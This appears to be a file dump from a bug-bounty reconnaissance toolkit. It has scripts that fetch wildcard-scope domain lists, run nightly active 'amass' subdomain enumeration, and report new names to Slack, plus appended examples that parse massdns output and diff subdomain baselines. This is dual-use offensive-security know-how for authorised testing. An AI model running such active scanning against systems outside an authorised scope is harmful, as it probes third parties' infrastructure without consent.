WILDCARDS_URL = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/wildcards.txt"
WILDCARDS_FILE = "wildcards.txt"

# Colors
def print_red(skk): print("\033[91m{}\033[00m" .format(skk))
def print_cyan(skk): print("\033[96m{}\033[00m" .format(skk))
def print_yellow(skk): print("\033[93m{}\033[00m" .format(skk))

# Workflow
def download_file_from_url(url, file):
    """Fetch url into file. Returns (ok, http_status)."""
    result = False
    r = requests.get(url, allow_redirects=True)
    if r.status_code == 200:
        with open(file, "wb") as f:
            f.write(r.content)
        result = True
    return (result, r.status_code)

def read_domains_from_file(file):
    """Collect the root domains of '*.example.com' style entries. Returns (ok, set)."""
    result = False
    domains = set()
    with open(file, "r") as f:
        for line in f:
            if line.startswith("*."):
                domain = line[2:].rstrip("\n")
                domains.add(domain)
                result = True
    return (result, domains)

def main():
    print(" ")
    print_cyan("Wildcards")
    print(" ")
    print_cyan("[INFO] Roundin 'em up!")

    ok, status = download_file_from_url(WILDCARDS_URL, WILDCARDS_FILE)
    if not ok:
        sys.exit("[ERR] Failed to download file: {}".format(status))
    print("[INFO] Wrangled into: {}".format(WILDCARDS_FILE))

    ok, domains = read_domains_from_file(WILDCARDS_FILE)
    if not ok:
        sys.exit("[ERR] No wildcard domains found in file")
    print("[INFO] Wildcard root domains: {}".format(len(domains)))

    #for domain in domains:
    #    print("Domain: " + domain)

if (__name__ == "__main__"):
    try:
        main()
    except KeyboardInterrupt:
        print('\nKeyboardInterrupt Detected.')
        print('\nExiting...')
        sys.exit(0)

================================================
FILE: scripts/wildcards.sh
================================================
#!/usr/bin/env bash
#############################################################
# wildcards.sh
#
# This script is intended to run on a VPS as a cron job.
# Run it nightly and it will report any newly discovered sub domains
# from the list of root domains that use wildcard scope.
#############################################################

# Set an environment variable in your .bashrc for your Slack webhook
# export __WILDCARDS_SLACK="https://hooks.slack.com/services/"
# The webhook URL is a credential: it is read from that variable (or from
# argument 2) and is deliberately never written to log.txt.
#
# Setup cron to run at a certain hour every night, example below at 2 am
# crontab -e
# m h dom mon dow command
# 0 2 * * * /bin/bash /path/to/wildcards.sh <domain>

DOMAIN=$1
SLACK=${2:-$__WILDCARDS_SLACK}

if [[ -z "$DOMAIN" ]]
then
    echo "[x] Missing domain"
    exit 1
fi

if [[ -z "$SLACK" ]]
then
    echo "[x] Missing Slack webhook (argument 2 or __WILDCARDS_SLACK)"
    exit 1
fi

echo $(date) >> log.txt
echo "$DOMAIN" >> log.txt

curl -X POST --data-urlencode payload="{\"text\": \"Wildcards starting for $DOMAIN \"}" $SLACK

amass enum -active -ip -d $DOMAIN

DIFF=$(amass track -d $DOMAIN -last 2 | grep Found | awk '{print $2}')
echo "Diff: $DIFF" >> log.txt

if [[ ! -z "$DIFF" ]]
then
    curl -X POST --data-urlencode payload="{\"text\": \"$DIFF\"}" $SLACK
fi

curl -X POST --data-urlencode payload="{\"text\": \"Wildcards completed for $DOMAIN \"}" $SLACK

================================================
FILE: system/hidpi.sh
================================================
#!/usr/bin/env bash
xfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI
xfconf-query -c xsettings -p /Gdk/WindowScalingFactor -n -t 'int' -s 2

cat <<- EOF >> ~/.xsessionrc
export QT_SCALE_FACTOR=2
export XCURSOR_SIZE=48
export GDK_SCALE=2
EOF
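The lookups() step in scripts/recon.zsh turns massdns output into the hostname and IP lists that every later stage (nmap, httprobe, gobuster) consumes, using sed and grep text chains that key on characters rather than on fields. The following is an added example, not code from quiver, that parses massdns "-o S" output ("name. TYPE data", one record per line) by field instead, so a name containing an uppercase letter or an unexpected record type cannot corrupt the list, and it refuses malformed IPv4 answers before they reach a port scanner. The record lines are constructed sample data; the functions take a file path just as lookups() does, and the code is portable sh so it runs under zsh or bash.

```shell
#!/usr/bin/env sh
# Added example, not part of quiver: parse massdns "-o S" output by field.
# Each line is "<name>. <TYPE> <data>"; the sample below is constructed.
SAMPLE='www.example.com. A 93.184.216.34
api.example.com. CNAME edge.example-cdn.net.
edge.example-cdn.net. A 203.0.113.10
edge.example-cdn.net. A 203.0.113.9
Aardvark.example.com. A 198.51.100.7
bad.example.com. A 999.1.1.1
www.example.com. A 93.184.216.34'

# resolved_hosts FILE
# Names that produced an A or CNAME answer: trailing dot removed, lowercased
# (DNS names are case-insensitive), de-duplicated. Works on the first field,
# so a name such as Aardvark.example.com is kept intact.
resolved_hosts() {
    awk '$2 == "A" || $2 == "CNAME" { sub(/\.$/, "", $1); print tolower($1) }' "$1" | sort -u
}

# resolved_ips FILE
# IPv4 addresses from A records only; every octet must be <= 255 so a
# malformed or injected answer never reaches the port scanner. Sorted
# numerically octet by octet (POSIX sort keys, no GNU -V needed).
resolved_ips() {
    awk '$2 == "A" && split($3, o, ".") == 4 &&
         o[1] <= 255 && o[2] <= 255 && o[3] <= 255 && o[4] <= 255 { print $3 }' "$1" |
        sort -t. -k1,1n -k2,2n -k3,3n -k4,4n | uniq
}

# stand-alone demo on the constructed sample
sample_file=$(mktemp)
printf '%s\n' "$SAMPLE" > "$sample_file"
echo "[hosts]"; resolved_hosts "$sample_file"
echo "[ips]";   resolved_ips "$sample_file"
rm -f "$sample_file"
```

Drop-in use inside lookups() would be `resolved_hosts "${F_SUBS_RES}" >> "${F_HOSTS}"` and `resolved_ips "${F_SUBS_RES}" > "${F_HOSTS_IP}"`. The CNAME target (edge.example-cdn.net) only appears in the host list because massdns also answered its A record; if a target is out of scope, filter the host list against the root domain before scanning it.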
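scripts/wildcards.sh leaves the "what is new since last night" question to `amass track`, pastes the result straight into a JSON string, and takes the webhook URL from the command line. The following is an added example, not code from quiver, that keeps a per-domain baseline file and reports only names not seen before (a plain sorted diff instead of `amass track`), escapes the message before it becomes JSON so a hostname containing a quote or backslash cannot break the payload, and reads the webhook from the environment variable WILDCARDS_SLACK (a name assumed here) so it never appears in process listings, the crontab, or log.txt. The baseline and current lists are constructed sample data; the notify step only fires when the variable is set, and the code is portable sh.

```shell
#!/usr/bin/env sh
# Added example, not part of quiver: baseline diff and safe Slack notification
# for nightly wildcard-scope monitoring. WILDCARDS_SLACK is an assumed name.

# new_subdomains BASELINE CURRENT
# Prints names present in CURRENT but not in BASELINE, one per line, sorted.
new_subdomains() {
    a=$(mktemp) && b=$(mktemp) || return 1
    sort -u "$1" > "$a"
    sort -u "$2" > "$b"
    comm -13 "$a" "$b"
    rm -f "$a" "$b"
}

# update_baseline BASELINE CURRENT
# Merges CURRENT into BASELINE via a temp file in the same directory and a
# rename, so an interrupted run never leaves a half-written baseline behind.
update_baseline() {
    t="$1.tmp.$$"
    sort -u "$1" "$2" > "$t" && mv "$t" "$1"
}

# json_escape STRING
# Escapes backslashes and double quotes and joins lines with \n so the value
# can sit inside a JSON string literal. Enough for hostnames and short status
# text; other control characters are not handled.
json_escape() {
    printf '%s\n' "$1" |
        sed -e 's/\\/\\\\/g' -e 's/"/\\"/g' |
        awk 'NR > 1 { printf "\\n" } { printf "%s", $0 }'
}

# slack_payload TEXT -> JSON body for a Slack incoming webhook
slack_payload() {
    printf '{"text":"%s"}' "$(json_escape "$1")"
}

# notify_slack TEXT
# Posts TEXT to the webhook in $WILDCARDS_SLACK. The URL is read from the
# environment only and is never echoed or logged.
notify_slack() {
    [ -n "$WILDCARDS_SLACK" ] || { echo "[!] WILDCARDS_SLACK not set; skipping notification" >&2; return 1; }
    curl -fsS -X POST -H 'Content-Type: application/json' \
        --data "$(slack_payload "$1")" "$WILDCARDS_SLACK" > /dev/null
}

# report_new BASELINE CURRENT DOMAIN
# Prints the new names, notifies if configured, then folds them into the baseline.
report_new() {
    new=$(new_subdomains "$1" "$2")
    if [ -n "$new" ]; then
        echo "$new"
        notify_slack "New subdomains for $3: $(echo "$new" | tr '\n' ' ')" || true
        update_baseline "$1" "$2"
    fi
}

# stand-alone demo on constructed data
demo_dir=$(mktemp -d)
printf '%s\n' a.example.com b.example.com > "$demo_dir/baseline.txt"
printf '%s\n' b.example.com c.example.com a.example.com d.example.com > "$demo_dir/current.txt"
echo "[*] new since last run:"
report_new "$demo_dir/baseline.txt" "$demo_dir/current.txt" example.com
echo "[*] baseline now holds $(wc -l < "$demo_dir/baseline.txt") names"
rm -rf "$demo_dir"
```

In a cron setting the "current" file would be the output of the nightly `amass enum` run, and the baseline lives next to it per domain; because the baseline is only updated after the report, a run that dies mid-way reports the same names again rather than losing them.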